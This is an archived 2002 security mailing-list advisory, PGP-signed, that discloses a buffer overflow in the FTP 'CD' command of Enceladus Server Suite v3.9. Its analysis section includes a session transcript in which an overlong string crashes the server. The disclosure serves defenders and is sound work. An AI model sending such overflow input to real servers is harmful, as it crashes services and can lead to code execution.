[VulnWatch] [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability

From: Tamer Sahin (ts@securityoffice.net)
Date: 12/09/02

  • Next message: Rob klein Gunnewiek: "[VulnWatch] proftpd <=1.2.7rc3 DoS" 
    Date: Mon, 9 Dec 2002 20:32:06 +0200
From: Tamer Sahin <ts@securityoffice.net>
To: vulnwatch@vulnwatch.org

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: MD5

    - --[ Enceladus Server Suite v3.9 Buffer Overflow Vulnerability ]--

    - --[ Type

    Buffer Overflow

    - --[ Release Date

    December 09, 2002

    - --[ Product / Vendor

    Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server for
    Windows, provides secure file sharing on any network. Perfect for Broadband, Cable
    Modem, Small business and Personal Use. You don't have to be an expert to setup
    file sharing or run your own web site and FTP Server. This Server Suite is One of
    the Easiest To Install and Operate.

    http://www.mollensoft.com

    - --[ Summary

    Enceladus Server Suite is vulnerable to a buffer overflow condition. An attacker
    may supply a long sequence of characters as an argument to "CD" command.
    If the length of the supplied string exceeds the size of its input buffer, the
    excess data will overwrite other variables on the stack and the stack frame
     itself. It is possible for a malicious user to craft a request that will result in code
    execution on the vulnerable system.

    - --[ Tested

    Enceladus Server Suite v3.9 / Windows 2000 sp3
    Enceladus Server Suite v3.9 / Windows 98 SE

    - --[ Vulnerable

    Enceladus Server Suite v3.9 / Windows 2000 sp3
    Enceladus Server Suite v3.9 / Windows 98 SE

    - --[ Analysis

    An analysis for this vulnerability exists and is available below.

    ==================== SNIP ====================

    ts@metacortex:~$ ftp 192.168.10.2
    Connected to 192.168.10.2.
    220 Mollensoft FTP Server Ready.
    Name (192.168.10.2:ts): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    500 'EPSV': command not understood.
    227 Entering Passive Mode (192,168,10,2,6,160)
    150 Data connection open for PASV transfer.
    - -rwxr-xr-x 1 User Group 6468 Feb 17 01:13 index.html
    - -rwxr-xr-x 1 User Group 70 Oct 31 04:52 readme.txt
    226 Listing complete.
    ftp> cd @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@
    421 Service not available, remote server has closed connection.

    ==================== SNIP ====================

    - --[ Disclaimer

    http://www.securityoffice.net is not responsible for the misuse or illegal use of
    any of the information and/or the software listed on this security advisory.

    - --[ Author

    Tamer Sahin
    ts@securityoffice.net
    http://www.securityoffice.net

    All our advisories can be viewed at http://www.securityoffice.net/articles/

    Please send suggestions, updates, and comments to feedback@securityoffice.net

    (c) 2002 SecurityOffice

    This Security Advisory may be reproduced and distributed, provided that this Security
    Advisory is not modified in any way and is attributed to SecurityOffice and provided
    that such reproduction and distribution is performed for non-commercial purposes.

    Tamer Sahin
    http://www.securityoffice.net

    -----BEGIN PGP SIGNATURE-----
    Version: 2.6

    iQEVAwUAPfThqPpL5ibJRTtBAQHVAgf6AnmCPT8iqOTMcYjU3RynwG7dhe8SkKQV
    dWjVgc/rY3X1NReDom3DkgyaxUKp8mPY11O5Gy1z2JfWhjMVmIAMsop4op2O+eLw
    M5bb8MTP5K6jiNzc9EY0YBgA0LHaisJ4zf3PaCWzyaj8r+JUW3Ww16f3JNQZyE8A
    1uKHenmeuyAW3tQQC4uYxkv2JDHPizTrGmxh3xxSk+INYt/jAfauvCGhZ83Yj1dz
    sdE/brtBc+LnUsrPSHvLcFnBEuTHjx7aE8GUnKmBhZAZKek3AzIcIshCjo/WgNLI
    yu8eEmooF7X55zB/0wy26qPYy79aRSho+oqsoWOFkVkcjn3adKF+RQ==
    =oPND
    -----END PGP SIGNATURE-----

    Relevant Pages

    • [NT] Enceladus Server Suite Buffer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet/Intranet lightweight Web and FTP Server for Windows, ... Enceladus Server Suite version 3.9 ... An analysis for this vulnerability exists and is available below. ...
      (Securiteam)
    • [Full-Disclosure] [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability
      ... provides secure file sharing on any network. ... file sharing or run your own web site and FTP Server. ... Enceladus Server Suite is vulnerable to a buffer overflow condition. ... This Security Advisory may be reproduced and distributed, ...
      (Full-Disclosure)
    • [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability
      ... provides secure file sharing on any network. ... file sharing or run your own web site and FTP Server. ... Enceladus Server Suite is vulnerable to a buffer overflow condition. ... This Security Advisory may be reproduced and distributed, ...
      (Bugtraq)
    • SecurityFocus Microsoft Newsletter #117
      ... Strengthening Network Security: FREE Guide Network security is a ... MICROSOFT VULNERABILITY SUMMARY ... Mollensoft Software Enceladus Server Suite Directory Traversal... ... An attacker is able to traverse outside of the established web root by ...
      (Focus-Microsoft)
    • [NT] Enceladus Server Directory Traversal Vulnerability
      ... Beyond Security would like to welcome Tiscali World Online ... * Enceladus Server Suite version 2.6.1 ... attackers to traverse up the root directory and view/download files on the ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)